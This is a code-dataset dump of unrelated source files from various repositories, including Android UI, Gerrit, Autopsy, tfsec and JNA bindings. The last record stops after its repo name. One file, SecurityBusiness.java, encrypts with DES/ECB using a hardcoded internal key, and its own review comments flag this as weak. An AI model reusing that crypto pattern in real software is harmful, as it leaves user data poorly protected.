repo_name
stringlengths
6
101
path
stringlengths
4
300
text
stringlengths
7
1.31M
geegloirco/geeglo-store
store-server/src/main/java/ir/geeglo/dev/store/business/SecurityBusiness.java
package ir.geeglo.dev.store.business;

import ir.piana.dev.secure.crypto.CryptoAttribute;
import ir.piana.dev.secure.crypto.CryptoMaker;
import ir.piana.dev.secure.key.SecretKeyAlgorithm;
import ir.piana.dev.secure.key.SecretKeyMaker;
import ir.piana.dev.secure.util.Base64Converter;
import org.springframework.beans.factory.annotation.Value;
import org.springframework.beans.factory.config.ConfigurableBeanFactory;
import org.springframework.context.annotation.PropertySource;
import org.springframework.context.annotation.Scope;
import org.springframework.stereotype.Repository;

import javax.annotation.PostConstruct;
import javax.crypto.SecretKey;
import java.nio.charset.StandardCharsets;

/**
 * Singleton crypto helper: unwraps the configured DES secret key (which is
 * itself stored encrypted under a built-in internal key) and offers
 * Base64-wrapped DES/ECB/PKCS5 encrypt/decrypt of strings.
 *
 * <p>NOTE(review): DES in ECB mode is cryptographically weak (56-bit key, no
 * diffusion across blocks). Migrating to AES/GCM should be considered, but
 * that changes the wire format, so it is only flagged here.
 *
 * @author (name redacted), 10/14/2018
 */
@Repository("SecurityBusiness")
@PropertySource(value = "classpath:application.properties")
@Scope(value = ConfigurableBeanFactory.SCOPE_SINGLETON)
public class SecurityBusiness {
    // NOTE(review): the original line read `= "<KEY>;` — the checked-in key was
    // redacted and took the closing quote with it, so the file no longer
    // compiled. Quote restored; the real key material must be re-supplied.
    private static final String INTERNAL_KEY = "<KEY>";

    // Built-in key used only to decrypt the configured key below.
    private static SecretKey internalKey;

    // Encrypted form of the application key, from application.properties.
    @Value("${security.secret-key.des}")
    private String secureKeyString;

    // The unwrapped application key used by the public encrypt/decrypt API.
    private SecretKey secretKey;

    static {
        try {
            internalKey = SecretKeyMaker.asSecretKey(INTERNAL_KEY, SecretKeyAlgorithm.DES);
        } catch (Exception e) {
            // NOTE(review): swallowing this leaves internalKey null and every
            // later call failing with NPE; failing fast (or logging via SLF4J)
            // would localize the error. Behavior kept to avoid changing startup
            // semantics.
            e.printStackTrace();
        }
    }

    /**
     * Decrypts the configured secret key with the internal key and caches the
     * resulting {@link SecretKey} for the public API.
     */
    @PostConstruct
    public void init() {
        try {
            String decryptedSecureKey = decryptDesEcbPkcs5paddingFromBase64Internal(secureKeyString);
            secretKey = SecretKeyMaker.asSecretKey(decryptedSecureKey, SecretKeyAlgorithm.DES);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    /** Encrypts {@code rawString} with the internal key; returns Base64 ciphertext. */
    private static String encryptDesEcbPkcs5paddingAsBase64Internal(String rawString)
            throws Exception {
        // StandardCharsets.UTF_8 avoids the checked charset-name lookup of getBytes("UTF-8").
        return Base64Converter.toBase64String(
                CryptoMaker.encrypt(rawString.getBytes(StandardCharsets.UTF_8),
                        internalKey, CryptoAttribute.DES_ECB_PKCS_5_PADDING));
    }

    /** Decrypts Base64 ciphertext produced with the internal key back to a UTF-8 string. */
    private static String decryptDesEcbPkcs5paddingFromBase64Internal(String encrypted)
            throws Exception {
        return new String(
                CryptoMaker.decrypt(Base64Converter.fromBase64String(encrypted),
                        internalKey, CryptoAttribute.DES_ECB_PKCS_5_PADDING),
                StandardCharsets.UTF_8);
    }

    /**
     * Encrypts {@code rawString} with the application key.
     *
     * @param rawString plaintext to encrypt
     * @return Base64-encoded DES/ECB/PKCS5 ciphertext
     * @throws Exception if the underlying crypto provider fails
     */
    public String encryptDesEcbPkcs5paddingAsBase64(String rawString) throws Exception {
        return Base64Converter.toBase64String(
                CryptoMaker.encrypt(rawString.getBytes(StandardCharsets.UTF_8),
                        secretKey, CryptoAttribute.DES_ECB_PKCS_5_PADDING));
    }

    /**
     * Decrypts Base64 ciphertext produced by {@link #encryptDesEcbPkcs5paddingAsBase64}.
     *
     * @param encrypted Base64-encoded ciphertext
     * @return the decrypted UTF-8 plaintext
     * @throws Exception if the input is not valid Base64/ciphertext
     */
    public String decryptDesEcbPkcs5paddingFromBase64(String encrypted) throws Exception {
        return new String(
                CryptoMaker.decrypt(Base64Converter.fromBase64String(encrypted),
                        secretKey, CryptoAttribute.DES_ECB_PKCS_5_PADDING),
                StandardCharsets.UTF_8);
    }
}
WeiEast/qihaosou
app/src/main/java/com/qihaosou/ui/activity/EnterpriseDetailInfoActivity.java
<reponame>WeiEast/qihaosou<filename>app/src/main/java/com/qihaosou/ui/activity/EnterpriseDetailInfoActivity.java<gh_stars>0 package com.qihaosou.ui.activity; import android.content.Context; import android.content.Intent; import android.graphics.drawable.Drawable; import android.os.Bundle; import android.support.annotation.Nullable; import android.view.LayoutInflater; import android.view.View; import android.view.ViewGroup; import android.widget.AdapterView; import android.widget.BaseAdapter; import android.widget.ImageView; import android.widget.TextView; import android.widget.Toast; import com.lzy.okhttputils.OkHttpUtils; import com.lzy.okhttputils.callback.BeanCallBack; import com.lzy.okhttputils.https.TaskException; import com.qihaosou.R; import com.qihaosou.bean.BaseBean; import com.qihaosou.bean.HomePageGridViewBean; import com.qihaosou.bean.HomepageBean; import com.qihaosou.bean.IcinfoBean; import com.qihaosou.bean.IcinfoBody; import com.qihaosou.bean.IcinfoListBody; import com.qihaosou.bean.QihaosouBean; import com.qihaosou.callback.HomePageBeanCallBack; import com.qihaosou.callback.QihaosouBeanCallBack; import com.qihaosou.loading.LoadingAndRetryManager; import com.qihaosou.loading.OnLoadingAndRetryListener; import com.qihaosou.net.UriHelper; import com.qihaosou.util.L; import com.qihaosou.util.ToastUtil; import com.qihaosou.util.UIHelper; import com.qihaosou.view.LineGridView; import java.util.ArrayList; import java.util.List; import okhttp3.Request; import okhttp3.Response; /** * Created by Administrator on 2016/1/20. 
* 企业详情 */ public class EnterpriseDetailInfoActivity extends BaseActivity implements View.OnClickListener{ private String uuid; LoadingAndRetryManager mLoadingAndRetryManager; private LineGridView gridView; int[] resId = {R.mipmap.item_image_01,R.mipmap.item_image_02,R.mipmap.item_image_03,R.mipmap.item_image_04, R.mipmap.item_image_05,R.mipmap.item_image_06,R.mipmap.item_image_07,R.mipmap.item_image_08,R.mipmap.item_image_09,R.mipmap.item_image_10,R.mipmap.item_image_11,R.mipmap.item_image_12}; String[] titles = {"工商信息","工商变更","年报","网站信息","商标","专利","著作权","法院诉讼","失信信息","资质","招聘","招投标信息"}; private TextView btnAttent; private TextView btnComment; private TextView econ_nameTV,oper_nameTV,regist_capiTV,start_dateTV,register_statusTV,econ_kindTV,refreshTV; private TextView readCountTV; private List<IcinfoBean> list; private List<HomePageGridViewBean> gridViewlist; private HomePageGridViewAdapter gridViewAdapter; private HomepageBean homepageBean; //浏览量 private int readCount; //工商更改数量 private int changerecordsCount; //年报数量 private int annualCount; //网站数量 private int webCount; //商标数量 private int logoCount; //专利数量 private int patentCount; //著作权数量 private int copyrightCount; //法院诉讼数量 private int courtCount; //失信信息数量 private int dishonestyCount; //资质数量 private int qualificationCount; //招聘信息数量 private int recruitCount; //招标数量 private int tendersCount; //关注状态 private Boolean attentionStatus=false; //企业头像 private String companyAvatar; //创建时间 private String createDate; @Override protected void init() { gridView= (LineGridView) findViewById(R.id.line_gridview); mLoadingAndRetryManager = LoadingAndRetryManager.generate(this, null); //公司名称 econ_nameTV= (TextView) findViewById(R.id.tv_infodetial_name); //公司类型 econ_kindTV= (TextView) findViewById(R.id.tv_infodetial_type); //公司营业状态 register_statusTV= (TextView) findViewById(R.id.tv_compdetail_status); //法定代表 oper_nameTV= (TextView) findViewById(R.id.tv_compdetail_opername); //注册资本 regist_capiTV= (TextView) 
findViewById(R.id.tv_compdetail_registcapi); //成立日期 start_dateTV= (TextView) findViewById(R.id.tv_compdetail_checkdate); //更新时间 refreshTV= (TextView) findViewById(R.id.tv_infodetial_refresh); //关注 btnAttent= (TextView) findViewById(R.id.tv_infordetial_attention); //阅读量 readCountTV= (TextView) findViewById(R.id.tv_detailinfo_attention); //评论 btnComment= (TextView) findViewById(R.id.tv_infordetial_comment); } @Override protected void addListener() { gridView.setOnItemClickListener(new AdapterView.OnItemClickListener() { @Override public void onItemClick(AdapterView<?> parent, View view, int position, long id) { if(homepageBean==null){ ToastUtil.TextToast(EnterpriseDetailInfoActivity.this,"暂无公司信息"); return; } Bundle bundle=new Bundle(); bundle.putString("uuid",uuid); bundle.putString("name",homepageBean.getEconName()); int num=gridViewlist.get(position).getNum(); switch (position){ case 0: case 1: case 2: UIHelper.showEnterpriseInfoDetailsActivity(EnterpriseDetailInfoActivity.this,bundle); break; case 3: if(isHasInfo(num)) UIHelper.showWebInfoActivity(EnterpriseDetailInfoActivity.this,bundle); break; case 4: if(isHasInfo(num)) UIHelper.showMarkListActivity(EnterpriseDetailInfoActivity.this, bundle); break; case 5: if(isHasInfo(num)) UIHelper.showCompanyPatentActivity(EnterpriseDetailInfoActivity.this, bundle); break; case 6: if(isHasInfo(num)) UIHelper.showCopyRightActivity(EnterpriseDetailInfoActivity.this, bundle); break; case 7: if(isHasInfo(num)) UIHelper.showCourtListActivity(EnterpriseDetailInfoActivity.this,bundle); break; case 8: if(isHasInfo(num)) UIHelper.showDishonestyActivity(EnterpriseDetailInfoActivity.this,bundle); break; case 10: if(isHasInfo(num)) UIHelper.showRecruitInfoActivity(EnterpriseDetailInfoActivity.this,bundle); break; case 11: if(isHasInfo(num)) UIHelper.showTenderActivity(EnterpriseDetailInfoActivity.this,bundle); break; } } }); btnAttent.setOnClickListener(this); btnComment.setOnClickListener(this); } private boolean isHasInfo(int num){ 
if(num==0){ ToastUtil.TextToast(this,"暂无相关信息"); return false; } return true; } @Override protected void addData() { // loadData(); setTitle("企业详情"); uuid=getIntent().getExtras().getString("uuid"); mLoadingAndRetryManager.showLoading(); gridViewlist=new ArrayList<HomePageGridViewBean>(); initGridViewData(); gridViewAdapter=new HomePageGridViewAdapter(this,gridViewlist); gridView.setAdapter(gridViewAdapter); getHomePage(uuid); } private void loadData() { mLoadingAndRetryManager.showLoading(); new Thread() { @Override public void run() { try { Thread.sleep(2000); } catch (InterruptedException e) { e.printStackTrace(); } mLoadingAndRetryManager.showContent(); } }.start(); } @Override protected int getContentViewLayoutID() { return R.layout.activity_enterprise_detailinfo1; } @Override public void onClick(View v) { switch (v.getId()){ case R.id.tv_infordetial_attention://关注,取消关注 if(attentionStatus) cancelAttent(uuid); else attent(uuid); break; case R.id.tv_infordetial_comment://评论 readyGo(CommentListActivity.class); } } class HomePageGridViewAdapter extends BaseAdapter { private Context context; private List<HomePageGridViewBean> list; private LayoutInflater inflater; public HomePageGridViewAdapter(Context context,List<HomePageGridViewBean> list){ this.context=context; this.list=list; inflater=LayoutInflater.from(context); } @Override public int getCount() { return list.size(); } @Override public Object getItem(int i) { return list.get(i); } @Override public long getItemId(int i) { return i; } @Override public View getView(int i, View convertView, ViewGroup viewGroup) { Holder holder = null; if(convertView == null){ holder = new Holder(); convertView = inflater.inflate( R.layout.item_enterprise_detailinfo_gridview, null); holder.tv = ((TextView) convertView.findViewById(R.id.btn_fun)); holder.numTV= (TextView) convertView.findViewById(R.id.tv_num); convertView.setTag(holder); } else { holder = ((Holder) convertView.getTag()); } 
holder.tv.setCompoundDrawablesWithIntrinsicBounds(0, list.get(i).getImgId(), 0, 0); holder.tv.setText(list.get(i).getName()); if(i!=0) holder.numTV.setText(""+list.get(i).getNum()); return convertView; } } static class Holder{ TextView tv; TextView numTV; } public void setRetryEvent(View retryView) { View view = retryView.findViewById(R.id.id_btn_retry); view.setOnClickListener(new View.OnClickListener() { @Override public void onClick(View v) { Toast.makeText(EnterpriseDetailInfoActivity.this, "retry event invoked", Toast.LENGTH_SHORT).show(); } }); } private void getHomePage(String uuid){ OkHttpUtils.post(UriHelper.getInstance().getHomePageUrl(uuid)).tag(this).execute(new HomePageBeanCallBack() { @Override public void onError(Request request, @Nullable Response response, @Nullable TaskException e) { ToastUtil.TextToast(getApplicationContext(), e.getMessage()); } @Override public void onAfter(@Nullable HomepageBean homepageBean, Request request, Response response, @Nullable TaskException e) { mLoadingAndRetryManager.showContent(); } @Override public void onResponse(HomepageBean homepageBean) { if (homepageBean != null){ EnterpriseDetailInfoActivity.this.homepageBean=homepageBean; fullinfo(homepageBean); } } }); } //初始化GridView数据 private void initGridViewData(){ gridViewlist.clear(); int[] resIds = {R.mipmap.item_image_01,R.mipmap.item_image_02,R.mipmap.item_image_03,R.mipmap.item_image_04, R.mipmap.item_image_05,R.mipmap.item_image_06,R.mipmap.item_image_07,R.mipmap.item_image_08,R.mipmap.item_image_09,R.mipmap.item_image_10,R.mipmap.item_image_11,R.mipmap.item_image_12}; String[] titles = {"工商信息","工商变更","年报","网站信息","商标","专利","著作权","法院诉讼","失信信息","资质","招聘","招投标信息"}; int[] nums={0,changerecordsCount,annualCount,webCount,logoCount,patentCount,copyrightCount,courtCount,dishonestyCount,qualificationCount,0,tendersCount}; for(int i=0;i<resId.length;i++){ HomePageGridViewBean homepageBean=new HomePageGridViewBean(resIds[i],titles[i],nums[i]); 
gridViewlist.add(homepageBean); } } private void fullinfo(HomepageBean homepageBean) { econ_nameTV.setText(homepageBean.getEconName()); econ_kindTV.setText(homepageBean.getEconKind()); start_dateTV.setText(homepageBean.getStartDate()); oper_nameTV.setText(homepageBean.getOperName()); regist_capiTV.setText(homepageBean.getRegistCapi()); register_statusTV.setText(homepageBean.getRegisterStatus()); refreshTV.setText(homepageBean.getUpdateTime()); changerecordsCount=Integer.valueOf(homepageBean.getChangerecordsCount()); annualCount=Integer.valueOf(homepageBean.getAnnualCount()); webCount=Integer.valueOf(homepageBean.getWebCount()); logoCount=Integer.valueOf(homepageBean.getLogoCount()); patentCount=Integer.valueOf(homepageBean.getPatentCount()); copyrightCount=Integer.valueOf(homepageBean.getCopyrightCount()); courtCount=Integer.valueOf(homepageBean.getCourtCount()); dishonestyCount=Integer.valueOf(homepageBean.getDishonestyCount()); qualificationCount=Integer.valueOf(homepageBean.getQualificationCount()); tendersCount=Integer.valueOf(homepageBean.getTendersCount()); gridViewAdapter.notifyDataSetChanged(); readCountTV.setText("" + homepageBean.getReadCount()); attentionStatus=homepageBean.getAttentionStatus().equals("0")?true:false; if(attentionStatus){ Drawable add=getResources().getDrawable(R.mipmap.add_attention, null); add.setBounds(0,0,add.getMinimumWidth(),add.getMinimumHeight()); btnAttent.setCompoundDrawables(null, add, null, null); }else{ Drawable cancel=getResources().getDrawable(R.mipmap.cancel_attention, null); cancel.setBounds(0,0,cancel.getMinimumWidth(),cancel.getMinimumHeight()); btnAttent.setCompoundDrawables(null, cancel, null, null); } initGridViewData(); gridViewAdapter.notifyDataSetChanged(); } //关注 private void attent(String uuid){ OkHttpUtils.post(UriHelper.getInstance().getAttentUrl(uuid)).tag(this).execute(new QihaosouBeanCallBack() { @Override public void onError(Request request, @Nullable Response response, @Nullable TaskException e) { 
ToastUtil.TextToast(getApplicationContext(),e.getMessage()); } @Override public void onResponse(QihaosouBean qihaosouBean) { ToastUtil.TextToast(getApplicationContext(), "关注成功"); Drawable add=getResources().getDrawable(R.mipmap.add_attention, null); add.setBounds(0, 0, add.getMinimumWidth(), add.getMinimumHeight()); btnAttent.setCompoundDrawables(null, add, null, null); attentionStatus=true; } }); } //取消关注 private void cancelAttent(String uuid){ OkHttpUtils.post(UriHelper.getInstance().cancelAttentUrl(uuid)).tag(this).execute(new QihaosouBeanCallBack() { @Override public void onError(Request request, @Nullable Response response, @Nullable TaskException e) { ToastUtil.TextToast(getApplicationContext(),e.getMessage()); } @Override public void onResponse(QihaosouBean qihaosouBean) { ToastUtil.TextToast(getApplicationContext(),"取消关注"); Drawable cancel=getResources().getDrawable(R.mipmap.cancel_attention, null); cancel.setBounds(0, 0, cancel.getMinimumWidth(), cancel.getMinimumHeight()); btnAttent.setCompoundDrawables(null, cancel, null, null); attentionStatus=false; } }); } }
jinjingbo/fine-uploader
client/js/export.js
/* globals define, module, global, qq */
(function() {
    "use strict";

    // Export the `qq` namespace for whichever module system is present:
    // AMD, CommonJS, or a plain global.
    var hasAmd = typeof define === "function" && define.amd;
    var hasCommonJs = typeof module !== "undefined" && module.exports;

    if (hasAmd) {
        define(function() {
            return qq;
        });
    } else if (hasCommonJs) {
        module.exports = qq;
    } else {
        global.qq = qq;
    }
}());
raman-bt/autopsy
KeywordSearch/src/org/sleuthkit/autopsy/keywordsearch/ContentHit.java
/*
 * Autopsy Forensic Browser
 *
 * Copyright 2011 Basis Technology Corp.
 * Contact: carrier <at> sleuthkit <dot> org
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
package org.sleuthkit.autopsy.keywordsearch;

import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;
import org.sleuthkit.datamodel.AbstractFile;

/**
 * Represents result of keyword search query containing the Content it hit
 * and chunk information, if the result hit is a content chunk.
 * A chunk ID of 0 means the hit is on the file itself, not a chunk.
 */
public class ContentHit {

    private final AbstractFile content;
    private int chunkID = 0;

    ContentHit(AbstractFile content) {
        // Delegate so both constructors share one initialization path.
        this(content, 0);
    }

    ContentHit(AbstractFile content, int chunkID) {
        this.content = content;
        this.chunkID = chunkID;
    }

    AbstractFile getContent() {
        return content;
    }

    long getId() {
        return content.getId();
    }

    int getChunkId() {
        return chunkID;
    }

    boolean isChunk() {
        return chunkID != 0;
    }

    @Override
    public boolean equals(Object obj) {
        if (this == obj) {
            return true;
        }
        if (obj == null || getClass() != obj.getClass()) {
            return false;
        }
        final ContentHit other = (ContentHit) obj;
        // Null-safe content comparison; equal only when both file and chunk match.
        return this.chunkID == other.chunkID
                && (this.content == other.content
                    || (this.content != null && this.content.equals(other.content)));
    }

    @Override
    public int hashCode() {
        // Same constants as before so hash values are unchanged.
        int hash = 3;
        hash = 41 * hash + (this.content != null ? this.content.hashCode() : 0);
        hash = 41 * hash + this.chunkID;
        return hash;
    }

    /**
     * Flattens hits to one entry per unique AbstractFile, keeping the first
     * chunk id encountered for each file.
     */
    static Map<AbstractFile, Integer> flattenResults(List<ContentHit> hits) {
        Map<AbstractFile, Integer> ret = new LinkedHashMap<AbstractFile, Integer>();
        for (ContentHit h : hits) {
            AbstractFile f = h.getContent();
            if (!ret.containsKey(f)) {
                ret.put(f, h.getChunkId());
            }
        }
        return ret;
    }

    /**
     * Flattens keyword-keyed results to one entry per unique AbstractFile,
     * keeping the first chunk id encountered for each file.
     */
    static LinkedHashMap<AbstractFile, Integer> flattenResults(Map<String, List<ContentHit>> results) {
        LinkedHashMap<AbstractFile, Integer> flattened = new LinkedHashMap<AbstractFile, Integer>();
        // Iterate values directly instead of keySet() + get() double lookups.
        for (List<ContentHit> hitList : results.values()) {
            for (ContentHit hit : hitList) {
                AbstractFile abstractFile = hit.getContent();
                if (!flattened.containsKey(abstractFile)) {
                    flattened.put(abstractFile, hit.getChunkId());
                }
            }
        }
        return flattened;
    }
}
infamous19/gerrit
java/com/google/gerrit/extensions/common/GroupInfo.java
// Copyright (C) 2015 The Android Open Source Project
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.

package com.google.gerrit.extensions.common;

import java.sql.Timestamp;
import java.util.List;

/**
 * REST API representation of a group. Fields are null when not applicable or
 * not requested; see the per-field comments below.
 */
public class GroupInfo extends GroupBaseInfo {
  public String url;
  public GroupOptionsInfo options;

  // These fields are only supplied for internal groups.
  public String description;
  public Integer groupId;
  @Deprecated public String owner;
  @Deprecated public String ownerId;
  public Timestamp createdOn;
  public Boolean _moreGroups;

  // These fields are only supplied for internal groups, and only if requested.
  public List<AccountInfo> members;
  public List<GroupInfo> includes;
}
gminteer/tenpai-buddy
client/src/slices/me.js
import {createSlice} from '@reduxjs/toolkit';

// Shape of the signed-in user's state before anything has loaded.
const initialState = {_id: null, email: '', profile: {_id: null, username: ''}};

// "me" slice: its single action wholesale-replaces the state with the payload.
const slice = createSlice({
  name: 'me',
  initialState,
  reducers: {
    update(state, {payload}) {
      return payload;
    },
  },
});

export const {update} = slice.actions;
export default slice.reducer;
PlexPt/gh4a
app/src/main/java/com/gh4a/resolver/CommitDiffLoadTask.java
package com.gh4a.resolver;

import android.content.Intent;
import android.support.annotation.VisibleForTesting;
import android.support.v4.app.FragmentActivity;

import com.gh4a.activities.CommitDiffViewerActivity;
import com.gh4a.loader.CommitCommentListLoader;
import com.gh4a.loader.CommitLoader;

import org.eclipse.egit.github.core.CommitComment;
import org.eclipse.egit.github.core.CommitFile;
import org.eclipse.egit.github.core.RepositoryCommit;

import java.util.List;

/**
 * Diff-load task for a commit whose SHA is already known: loads the commit's
 * files and comments and launches the commit diff viewer.
 */
public class CommitDiffLoadTask extends DiffLoadTask {
    @VisibleForTesting
    protected final String mSha;

    public CommitDiffLoadTask(FragmentActivity activity, String repoOwner, String repoName,
            DiffHighlightId diffId, String sha) {
        super(activity, repoOwner, repoName, diffId);
        mSha = sha;
    }

    @Override
    public String getSha() throws Exception {
        // The SHA was supplied up front, so no lookup is needed.
        return mSha;
    }

    @Override
    protected List<CommitFile> getFiles() throws Exception {
        // Load the commit and hand back its file list directly.
        return CommitLoader.loadCommit(mRepoOwner, mRepoName, mSha).getFiles();
    }

    @Override
    protected List<CommitComment> getComments() throws Exception {
        return CommitCommentListLoader.loadComments(mRepoOwner, mRepoName, mSha);
    }

    @Override
    protected Intent getLaunchIntent(String sha, CommitFile file,
            List<CommitComment> comments, DiffHighlightId diffId) {
        return CommitDiffViewerActivity.makeIntent(mActivity, mRepoOwner, mRepoName, sha,
                file.getFilename(), file.getPatch(), comments,
                diffId.startLine, diffId.endLine, diffId.right, null);
    }
}
chaspy/tfsec
internal/app/tfsec/rules/azure/container/logging_rule.go
package container

import (
	"github.com/aquasecurity/defsec/rules"
	"github.com/aquasecurity/defsec/rules/azure/container"
	"github.com/aquasecurity/tfsec/internal/app/tfsec/block"
	"github.com/aquasecurity/tfsec/internal/app/tfsec/scanner"
	"github.com/aquasecurity/tfsec/pkg/rule"
)

// init registers the AKS logging check (legacy ID AZU009): an
// azurerm_kubernetes_cluster should configure the oms_agent addon so that
// cluster logs flow to Azure Monitoring.
func init() {
	scanner.RegisterCheckRule(rule.Rule{
		LegacyID: "AZU009",
		BadExample: []string{`
 resource "azurerm_kubernetes_cluster" "bad_example" {
     addon_profile {}
 }
 `},
		GoodExample: []string{`
 resource "azurerm_kubernetes_cluster" "good_example" {
     addon_profile {
         oms_agent {
             enabled = true
         }
     }
 }
 `},
		Links: []string{
			"https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/kubernetes_cluster#oms_agent",
		},
		RequiredTypes:  []string{"resource"},
		RequiredLabels: []string{"azurerm_kubernetes_cluster"},
		Base:           container.CheckLogging,
		CheckTerraform: func(resourceBlock block.Block, _ block.Module) (results rules.Results) {
			// Missing addon_profile.oms_agent entirely -> flag the whole resource.
			if resourceBlock.MissingNestedChild("addon_profile.oms_agent") {
				results.Add("Resource AKS logging to Azure Monitoring is not configured.", resourceBlock)
				return
			}
			// oms_agent present but explicitly disabled -> flag the attribute.
			enabledAttr := resourceBlock.GetNestedAttribute("addon_profile.oms_agent.enabled")
			if enabledAttr.IsFalse() {
				results.Add("Resource AKS logging to Azure Monitoring is not configured (oms_agent disabled).", enabledAttr)
			}
			return results
		},
	})
}
civilizeddev/fanuc-focas
src/main/java/fwlib32/in_dsfile.java
package fwlib32;

import com.sun.jna.NativeLong;
import com.sun.jna.Pointer;
import com.sun.jna.Structure;
import java.util.Arrays;
import java.util.List;

/**
 * This file was autogenerated by <a href="http://jnaerator.googlecode.com/">JNAerator</a>,<br>
 * a tool written by <a href="http://ochafik.com/"><NAME></a> that <a href="http://code.google.com/p/jnaerator/wiki/CreditsAndLicense">uses a few opensource projects.</a>.<br>
 * For help, please visit <a href="http://nativelibs4java.googlecode.com/">NativeLibs4Java</a> , <a href="http://rococoa.dev.java.net/">Rococoa</a>, or <a href="http://jna.dev.java.net/">JNA</a>.
 *
 * JNA mapping of the native IN_DSFILE struct (FANUC FOCAS fwlib32).
 * NOTE: the field declaration order below is ABI-critical — it must stay in
 * sync with getFieldOrder() and the native struct layout. Do not reorder.
 */
public class in_dsfile extends Structure {
	/** path name */
	public byte[] path = new byte[256];
	/** file number */
	public NativeLong fnum;
	/** offset */
	public NativeLong offset;
	/** request file num */
	public short req_num;
	/** size type */
	public short size_type;
	/** comment type */
	public short detail;
	// padding/reserved field in the native struct
	public short dummy;

	public in_dsfile() {
		super();
	}

	// Must list the fields in native declaration order (JNA requirement).
	protected List<String> getFieldOrder() {
		return Arrays.asList("path", "fnum", "offset", "req_num", "size_type", "detail", "dummy");
	}

	/**
	 * Full-field constructor.
	 * @param path path name buffer; must be exactly 256 bytes
	 * @throws IllegalArgumentException if path is not 256 bytes long
	 */
	public in_dsfile(byte path[], NativeLong fnum, NativeLong offset, short req_num, short size_type, short detail, short dummy) {
		super();
		if ((path.length != this.path.length))
			throw new IllegalArgumentException("Wrong array size !");
		this.path = path;
		this.fnum = fnum;
		this.offset = offset;
		this.req_num = req_num;
		this.size_type = size_type;
		this.detail = detail;
		this.dummy = dummy;
	}

	// Wraps an existing native memory region.
	public in_dsfile(Pointer peer) {
		super(peer);
	}

	public static class ByReference extends in_dsfile implements Structure.ByReference {
	};

	public static class ByValue extends in_dsfile implements Structure.ByValue {
	};
}
nikelin/Redshape-AS
ui/ui-bindings/src/main/java/com/redshape/ui/data/bindings/views/DefferedModel.java
/*
 * Copyright 2012 <NAME>
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
package com.redshape.ui.data.bindings.views;

import java.util.List;

import com.redshape.utils.beans.bindings.IBeanInfo;

/**
 * Leaf view model for a deferred bean type: it carries only the bean info
 * and rejects any child-related operations.
 */
public class DefferedModel extends AbstractView<IBeanInfo> implements IDefferedModel {

	private static final String CHILDS_UNSUPPORTED = "not supported in deffered type";

	public DefferedModel( IBeanInfo type ) {
		super(type);
	}

	/** Deferred models are leaves — children can never be attached. */
	@Override
	public void addChild(IViewModel<?> model) {
		throw new UnsupportedOperationException(CHILDS_UNSUPPORTED);
	}

	/** Deferred models are leaves — there are no children to enumerate. */
	@Override
	public List<IViewModel<?>> getChilds() {
		throw new UnsupportedOperationException(CHILDS_UNSUPPORTED);
	}
}
FMudanyali/libjsdl
src/main/java/org/libsdl/api/filesystem/SdlFilesystem.java
package org.libsdl.api.filesystem;

import com.sun.jna.Pointer;

import org.libsdl.jna.JnaUtils;
import org.libsdl.jna.NativeLoader;

/**
 * Java bindings for SDL's filesystem path queries. Each call copies the
 * native string and releases the SDL-allocated memory before returning.
 */
public final class SdlFilesystem {

    /** Utility class — not instantiable. */
    private SdlFilesystem() {
    }

    /**
     * Returns the directory the application was run from (SDL_GetBasePath).
     */
    public static String SDL_GetBasePath() {
        Pointer path = NativeFunctions.SDL_GetBasePath();
        return JnaUtils.extractStringAndReleaseNativeMemory(path);
    }

    /**
     * Returns a writable per-user directory for this org/app pair
     * (SDL_GetPrefPath).
     *
     * @param org organization name used to build the path
     * @param app application name used to build the path
     */
    public static String SDL_GetPrefPath(String org, String app) {
        Pointer path = NativeFunctions.SDL_GetPrefPath(org, app);
        return JnaUtils.extractStringAndReleaseNativeMemory(path);
    }

    private static final class NativeFunctions {

        static {
            NativeLoader.registerNativeMethods(NativeFunctions.class);
        }

        public static native Pointer SDL_GetBasePath();

        public static native Pointer SDL_GetPrefPath(
                String org,
                String app);
    }
}
phatblat/macOSPrivateFrameworks
PrivateFrameworks/PassKitUI/PKAutocompleteViewControllerDelegate-Protocol.h
//
// Generated by class-dump 3.5 (64 bit).
//
// class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2013 by <NAME>.
//

#import "NSObject.h"

@class NSIndexPath, NSView, PKAutocompleteViewController;

// Recovered (class-dump) delegate protocol for PKAutocompleteViewController.
// The required methods mirror a table-style data source (sections, row counts,
// row/header views) plus a completion callback; semantics are inferred from
// the names — confirm against runtime behavior before relying on them.
@protocol PKAutocompleteViewControllerDelegate <NSObject>
- (void)autocompleteViewControllerDidFinish:(PKAutocompleteViewController *)arg1;
- (NSView *)autocompleteViewController:(PKAutocompleteViewController *)arg1 viewForRowAtIndexPath:(NSIndexPath *)arg2;
- (NSView *)autocompleteViewController:(PKAutocompleteViewController *)arg1 viewForHeaderInSection:(long long)arg2;
- (long long)autocompleteViewController:(PKAutocompleteViewController *)arg1 numberOfRowsInSection:(long long)arg2;
- (long long)numberOfSectionsInAutocompleteViewController:(PKAutocompleteViewController *)arg1;

@optional
// Optional row-selection callback.
- (void)autocompleteViewController:(PKAutocompleteViewController *)arg1 didSelectRowAtIndexPath:(NSIndexPath *)arg2;
@end
swedenconnect/eidas-eu-mock
